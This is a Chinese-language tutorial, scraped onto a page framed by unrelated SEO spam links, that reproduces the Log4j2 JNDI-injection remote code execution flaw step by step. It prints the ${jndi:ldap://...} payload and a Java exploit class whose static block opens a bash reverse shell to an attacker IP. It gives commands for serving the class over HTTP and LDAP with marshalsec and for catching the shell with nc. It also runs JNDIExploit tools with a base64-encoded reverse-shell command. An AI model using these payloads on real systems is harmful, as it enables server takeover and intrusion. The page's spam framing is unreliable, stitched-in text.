当前位置: 首页 > news >正文

广州外贸soho建站网页版微信二维码付款怎么弄

广州外贸soho建站,网页版微信二维码付款怎么弄,外网网站建设调研报告,做商城网站可以个人备案文章目录 一、log4j2二、背景三、影响版本四、漏洞原理五、LDAP和JNDI是什么六、漏洞手工复现1、利用DNSlog来测试漏洞是否存在2、加载恶意文件Exploit.java#xff0c;将其编译成class文件3、开启web服务4、在恶意文件Exploit.class所在的目录开启LDAP服务5、监听反弹shell的… 文章目录 一、log4j2二、背景三、影响版本四、漏洞原理五、LDAP和JNDI是什么六、漏洞手工复现1、利用DNSlog来测试漏洞是否存在2、加载恶意文件Exploit.java将其编译成class文件3、开启web服务4、在恶意文件Exploit.class所在的目录开启LDAP服务5、监听反弹shell的端口6、返回前端让受害者访问ldap的端口7、要点总结 七、漏洞工具复现1、使用工具JNDIExploit-1.2-SNAPSHOT.jar2、使用工具JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar 八、总结 一、log4j2 log4j2是全球使用广泛的java日志框架同时该漏洞还影响很多全球使用量的Top序列的通用开源组件。 二、背景 ------ 2021年11月24日阿里云安全团队向Apache官方报告了Apache Log4j2远程代码执行漏洞。由于Apache Log4j2某些功能存在递归解析功能攻击者可直接构造恶意请求触发远程代码执行漏洞。 ------ 2021年12月9日国内多家机构监测到Apache Log4j2存在任意代码执行漏洞并紧急通报相关情况。由于Apache Log4j存在递归解析功能未取得身份认证的用户可以从远程发送数据请求输入数据日志轻松触发漏洞最终在目标上执行任意代码。鉴于Apache Log4j本身涉及多种应用组件将此漏洞威胁等级调整为:严重。 三、影响版本 Log4j2.x2.14.1 四、漏洞原理 构造的payload是这样的 ${jndi:ldap://xxx.xxx.xxx.xxx:1389/Exp} ------ 该漏洞是由于Apache Log4j2某些功能存在递归解析功能未经身份验证的攻击者通过发送特定恶意数据包可在目标服务器上执行任意代码。 ------ Log4j2组件在处理程序日志记录时存在JNDI注入缺陷未经授权的攻击者利用该漏洞可向目标服务器发送精心构造的恶意数据触发Log4j2组件解析缺陷实现目标服务器的任意代码执行获得目标服务器权限。 五、LDAP和JNDI是什么 ------ LDAP全称是Lightweight Directory Access Protocol( 轻型目录访问协议)LDAP可以理解是一个简单存储数据的数据库。 ------ LDAP有一个客户端和服务器端server端是用来存放资源client端主要用于查询等操作。服务端都是由各大厂商的产品的比如Microsoft的AD当然可以自己做。客户端通过LDAP协议去访问服务器端。 ------ JNDI JAVA NAMING AND Directory interfaceJava命名和目录接口)则是Java中用于访问LDAP的API是为了Java程序访问命名服务和目录服务而提供的统一API。 ------ 所以上述的payload ${jndi:ldap://xxx.xxx.xxx.xxx:1389/Exp}就相当于ldap通过jndi来提供服务。xxx.xxx.xxx.xxx这个是LDAP服务器端的IP地址LDAP服务器是默认开启1389端口的Exp是一个不存在的文件名。说白了就是通过java中的JNDI 访问ldap协议的服务。 六、漏洞手工复现 1、利用DNSlog来测试漏洞是否存在 在DNSlog上获取一个域名dfkemb.dnslog.cn 在burp构造payload重新发送 ${jndi:ldap:// dfkemb.dnslog.cn:1389/Exp} 加入返回包回显400那就说明payload被过滤这时候就可以把payload进行URL编码再发送。 返回DNSlog查看 这样就说明存在漏洞 2、加载恶意文件Exploit.java将其编译成class文件 利用到javac来进行编译但这对Java版本有要求Java版本适用 的jdk 版本JDK 11.0.1、8u191、7u201、6u211 之前 下面是Exploit.java的内容 // javac TouchFile.java import java.lang.Runtime; import java.lang.Process; public class Exploit {static {try {Runtime rt Runtime.getRuntime();String[] commands {bash, -c, bash -i /dev/tcp/192.168.188.177/1234 01};Process pc rt.exec(commands);pc.waitFor();} catch (Exception e) {// do nothing}} }使用javac编译javac Exploit.java 编译后就生产一个Exploit.class文件 3、开启web服务 python3 -m http.server 80 4、在恶意文件Exploit.class所在的目录开启LDAP服务 利用工具marshalsec-0.0.3-SNAPSHOT-all.jar java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://192.168.188.177/#Exploit 9999这一步相当于把攻击机变成服务器让目标服务器作为客户端来访问我的攻击机。 5、监听反弹shell的端口 nc -lvnp 1234 6、返回前端让受害者访问ldap的端口 最后再回到监听窗口查看 这里就成功反弹shell了。 7、要点总结 上面第2、3、4、5步都是在攻击者端操作只有第6步是在普通前端操作。上面一共开启了3个端口分别是80、1234、9999。这分别对应的是web服务、接收反弹shell的、ldap服务。 七、漏洞工具复现 1、使用工具JNDIExploit-1.2-SNAPSHOT.jar -i是攻击机所在的IP-l是LDAP服务开启的端口-p是web服务开启的端口-u是攻击后payload的使用方式。 POC java -jar JNDIExploit-1.2-SNAPSHOT.jar -l 1389 -p 8888 -i 192.168.188.177 利用-u来查看使用的payload 选一条payload在前端来发送请求 这里选了ldap://null:1389/Basic/Command/[cmd] 这一条 2、使用工具JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar POC java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C “bash -c {echo,YmFzaCAtaSAJiAvZGV2L3RjcC8xOTIuMTY4LjE4OC4xNzcvMjg4OCAwPiYx}|{base64,-d}|{bash,-i}” -A “192.168.188.177” 其中YmFzaCAtaSAJiAvZGV2L3RjcC8xOTIuMTY4LjE4OC4xNzcvMjg4OCAwPiYx是bash -i /dev/tcp/192.168.188.177/2888 01的反弹shell命令的base64编码 上面的POC就是让受害者访问192.168.188.177:1389这个开启了LDAP服务的攻击端然后就反弹shell到192.168.188.177:2888这个地址和端口。 如下图 这图受害者要访问的POC是ldap://192.168.101.130:1389/ayox8z 八、总结 ------ Log4j2漏洞总的来说就是因为Log4j2默认支持解析ldap/rmi协议只要打印的日志中包括ldap/rmi协议即可并会通过名称从ldap服务端其获取对应的Class文件并使用ClassLoader在本地加载Ldap服务端返回的Class类。 ------ Apache Log4j 远程代码执行漏洞正是由于组件存在 Java JNDI 注入漏洞当程序将用户输入的数据记入日志时攻击者通过构造特殊请求来触发 Apache Log4j2 中的远程代码执行漏洞从而利用此漏洞在目标服务器上执行任意代码。 ------ 利用jndi访问ldap服务后ldap服务返回了class攻击代码被攻击的服务器执行了攻击代码。远程代码执行漏洞是利用了Log4j2可以对日志中的“${}”进行解析执行来进行攻击的。 ------ 简单来说就是Java中存在jndi这个接口用来访问ldap服务因为Log4j2默认支持解析ldap/rmi协议普通服务器访问ldap服务会直接解析服务中的class文件而无需过滤。攻击者就利用这一点在class文件中写入恶意代码当普通服务器访问ldap服务时就会解析了存在恶意代码的class文件并且执行从而被攻击。
http://www.hkea.cn/news/14580707/

相关文章:

  • 做自媒体与做网站网站管理和维护
  • 自助建站网站广州番禺区严格控制人员流动
  • 加大整合力度网站集约建设破解wordpress的密码
  • 广州网站优化多少钱折800网站程序
  • 怎么做自己公司的网站手机网站建设分析
  • 使馆网站建设简单网页设计成品
  • 网站设计需要那些人怎么去推广自己的网站
  • 企业手机网站17模板网站
  • 泰安网站制作服务都匀网站制作
  • 重庆网站公司记事本做网站报告
  • 邯郸网站建设推荐驰捷网络公司做的公司网站怎么没了
  • 网站的优化用什么软件wordpress只能访问主页
  • 建设银行社保卡网站在哪做企业推广去哪个网站比较好
  • 社区类网站建设舆情报告模板
  • 做网站能赚流量钱吗进出口贸易网站制作
  • 七星彩网投网站建设本溪市做网站公司
  • 网站防御怎么做怎么设计手机网站
  • 军民融合网站建设成都关键词排名提升
  • 有没有免费的企业网站建设医疗机构网站模板
  • wordpress怎么添加统计代码单页面网站怎么优化
  • 网站开发方式哪四种wordpress主题 反盗版
  • 做求职网站襄阳seo营销
  • 长春市宽城区建设局网站免费模版网站
  • 网站建设情况说明书wordpress 前台文章
  • 邯郸高端网站建设价格制作网页时经常用的一种动态位图格式是
  • 深圳网站建设怎么修改网站模板详解
  • 无锡企业网站排名优化wordpress页面关键词和描述
  • 自己做的网站能被别人看到吗网站建设项目确认书
  • 广州互助网站开发嘉兴高档网站建设
  • 鲜花网站建设项目策划书热门页游排行榜前十名